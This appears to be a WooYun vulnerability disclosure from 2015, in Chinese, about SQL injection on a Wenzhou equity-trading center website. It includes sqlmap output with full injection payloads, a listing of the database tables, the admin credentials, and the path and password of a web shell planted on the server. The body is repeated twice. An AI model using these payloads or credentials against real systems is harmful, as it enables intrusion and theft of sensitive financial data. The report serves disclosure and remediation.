漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0159566
漏洞标题:某股权营运中心sql注射,已入后台,已shell
相关厂商:温州市股权营运中心
漏洞作者: 路人甲
提交时间:2015-12-10 18:01
修复时间:2016-01-25 18:01
公开时间:2016-01-25 18:01
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开
简要描述:
rt
详细说明:
sql注入url:http://**.**.**.**:80/products2.php (POST)
x=0&y=0&ss='*
注入参数ss
sqlmap identified the following injection points with a total of 1523 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: x=0&y=0&ss=' AND (SELECT 1416 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(1416=1416,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- UWqp
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: x=0&y=0&ss=' AND (SELECT * FROM (SELECT(SLEEP(5)))gZvB)-- ifZy
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [4]:
[*] information_schema
[*] mysql
[*] myweb
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: x=0&y=0&ss=' AND (SELECT 1416 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(1416=1416,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- UWqp
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: x=0&y=0&ss=' AND (SELECT * FROM (SELECT(SLEEP(5)))gZvB)-- ifZy
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
Database: myweb
[34 tables]
+-------------------+
| admin |
| client |
| client_admin |
| xwm_announce |
| xwm_commentpro |
| xwm_comments |
| xwm_download |
| xwm_download_cate |
| xwm_file |
| xwm_guestbook |
| xwm_honer |
| xwm_honer_cate |
| xwm_info |
| xwm_info_cate |
| xwm_job |
| xwm_job_cate |
| xwm_keywords |
| xwm_link |
| xwm_managelog |
| xwm_member |
| xwm_membergroup |
| xwm_nwlink |
| xwm_nwlink_cate |
| xwm_offer |
| xwm_product |
| xwm_product_cate |
| xwm_sales |
| xwm_sales_cate |
| xwm_static |
| xwm_static_cate |
| xwm_stats |
| xwm_sub |
| xwm_sub1 |
| xwm_sub2 |
+-------------------+
知道管理员用户名:wzguquan密码:admin
登陆地址:**.**.**.**/admin
shell地址:http://**.**.**.**/uploaded_files/1449628572.php;php密码:abc
泄露大量数据和项目信息
由于涉及到股权交易信息,并未深入对服务器进行lcx转发,提权等。可自查。
漏洞证明:
sql注入url:http://**.**.**.**:80/products2.php (POST)
x=0&y=0&ss='*
注入参数ss
sqlmap identified the following injection points with a total of 1523 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: x=0&y=0&ss=' AND (SELECT 1416 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(1416=1416,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- UWqp
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: x=0&y=0&ss=' AND (SELECT * FROM (SELECT(SLEEP(5)))gZvB)-- ifZy
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [4]:
[*] information_schema
[*] mysql
[*] myweb
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: x=0&y=0&ss=' AND (SELECT 1416 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(1416=1416,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- UWqp
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: x=0&y=0&ss=' AND (SELECT * FROM (SELECT(SLEEP(5)))gZvB)-- ifZy
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
Database: myweb
[34 tables]
+-------------------+
| admin |
| client |
| client_admin |
| xwm_announce |
| xwm_commentpro |
| xwm_comments |
| xwm_download |
| xwm_download_cate |
| xwm_file |
| xwm_guestbook |
| xwm_honer |
| xwm_honer_cate |
| xwm_info |
| xwm_info_cate |
| xwm_job |
| xwm_job_cate |
| xwm_keywords |
| xwm_link |
| xwm_managelog |
| xwm_member |
| xwm_membergroup |
| xwm_nwlink |
| xwm_nwlink_cate |
| xwm_offer |
| xwm_product |
| xwm_product_cate |
| xwm_sales |
| xwm_sales_cate |
| xwm_static |
| xwm_static_cate |
| xwm_stats |
| xwm_sub |
| xwm_sub1 |
| xwm_sub2 |
+-------------------+
知道管理员用户名:wzguquan密码:admin
登陆地址:**.**.**.**/admin
shell地址:http://**.**.**.**/uploaded_files/1449628572.php;php密码:abc
泄露大量数据和项目信息
由于涉及到股权交易信息,并未深入对服务器进行lcx转发,提权等。可自查。
修复方案:
做好sql过滤,上传点的过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-12-14 17:15
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置。
最新状态:
暂无